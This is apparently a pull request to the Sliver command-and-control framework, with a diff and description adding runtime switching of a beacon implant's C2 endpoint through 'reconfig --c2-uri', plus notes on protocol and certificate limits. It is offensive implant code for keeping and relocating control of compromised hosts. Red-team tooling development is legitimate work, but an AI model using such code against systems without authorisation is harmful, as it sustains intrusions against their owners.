### PR TITLE
Add Dynamic C2 Endpoint Switching via reconfig --c2-uri

### DIFF
--- a/client/command/reconfig/commands.go
+++ b/client/command/reconfig/commands.go
@@ -26,6 +26,7 @@ func Commands(con *console.SliverClient) []*cobra.Command {
 		f.StringP("beacon-interval", "i", "", "beacon callback interval")
 		f.StringP("beacon-jitter", "j", "", "beacon callback jitter (random up to)")
 		f.Int64P("timeout", "t", flags.DefaultTimeout, "grpc timeout in seconds")
+		f.StringP("c2-uri", "c", "", "C2 URI to switch to")
 	})
 
 	renameCmd := &cobra.Command{

--- a/implant/sliver/handlers/handlers.go
+++ b/implant/sliver/handlers/handlers.go
@@ -1351,6 +1351,12 @@ func reconfigureHandler(data []byte, resp RPCResponse) {
 	if reconfigReq.BeaconJitter != 0 {
 		transports.SetJitter(reconfigReq.BeaconJitter)
 	}
+	if reconfigReq.C2URI != "" {
+		// {{if .Config.Debug}}
+		log.Printf("[*] Received new C2 URI: %s", reconfigReq.C2URI)
+		// {{end}}
+		transports.SetC2URI(reconfigReq.C2URI)
+	}
 	// {{end}}
 
 	reconfigResp := &sliverpb.Reconfigure{}

--- a/implant/sliver/transports/transports.go
+++ b/implant/sliver/transports/transports.go
@@ -36,6 +36,18 @@ const (
 	strategySequential   = "s"
 )
 
+var (
+	dynamicC2URI = ""
+)
+
+func SetC2URI(uri string) {
+	dynamicC2URI = uri
+}
+
+func GetC2URI() string {
+	return dynamicC2URI
+}
+
 // C2Generator - Creates a stream of C2 URLs based on a connection strategy
 func C2Generator(abort <-chan struct{}, temporaryC2 ...string) <-chan *url.URL {
 	// {{if .Config.Debug}}
@@ -78,6 +90,12 @@ func C2Generator(abort <-chan struct{}, temporaryC2 ...string) <-chan *url.URL {
 			default:
 				next = c2Servers[c2Counter%uint(len(c2Servers))]()
 			}
+
+			// check if reconfig used to set a new C2-URI 
+			if dynamic := GetC2URI(); dynamic != "" {
+				next = dynamic
+			}
+
 			c2Counter++
 			if ^uint(0) < c2Counter {
 				panic("counter overflow")

--- a/protobuf/sliverpb/sliver.proto
+++ b/protobuf/sliverpb/sliver.proto
@@ -1069,6 +1069,7 @@ message ReconfigureReq {
   int64 ReconnectInterval = 1;
   int64 BeaconInterval = 2;
   int64 BeaconJitter = 3;
+  string C2URI = 4;
 
   commonpb.Request Request = 9;
 }


### PR DESCRIPTION
fixed: #2072 

Adds the ability to change a beacon's C2 endpoint at runtime using the existing `reconfig` command, without requiring a new implant build. 

## flow
1. Operator sends `reconfig --c2-uri <new-uri>` → server queues task for beacon
2. Beacon picks up task on next check-in → handler calls `transports.SetC2URI()`
3. `beaconMainLoop` detects the URI change after the check-in cycle and returns
4. `beaconStartup` skips any stale pre-buffered beacons and the reconnect sleep
5. `C2Generator` sees the dynamic URI and yields it → new beacon object is created → connects to the new endpoint

## limitations (WIP)
1. because the beacon is compiled only with one transport implementations (mTLS, HTTP, WG, DNS) we can not change the protocol via `reconfig --c2-uri`. for now you can only change to the same current protocol.  so protocol mismatch is blocked with an error before the task is sent. 

2. because the implant's mTLS certificates are baked in at compile time, a beacon can only perform a TLS handshake with a server sharing the exact same cryptographic identity. Switching to a different Sliver server instance will fail unless both servers share the same ~/.sliver/ crypto material, so also a warning is printed if the target host differs from the current one to prevent configuration mismatches.

is there currently a built-in or recommended way to migrate/handover an implant from one sliver server to another, even if it requires re-executing the implant? This would help in addressing the second limitation more effectively.


<!-- https://github.com/user-attachments/assets/eb1a909b-b248-4291-bb17-32a7de1c80d2 --> 


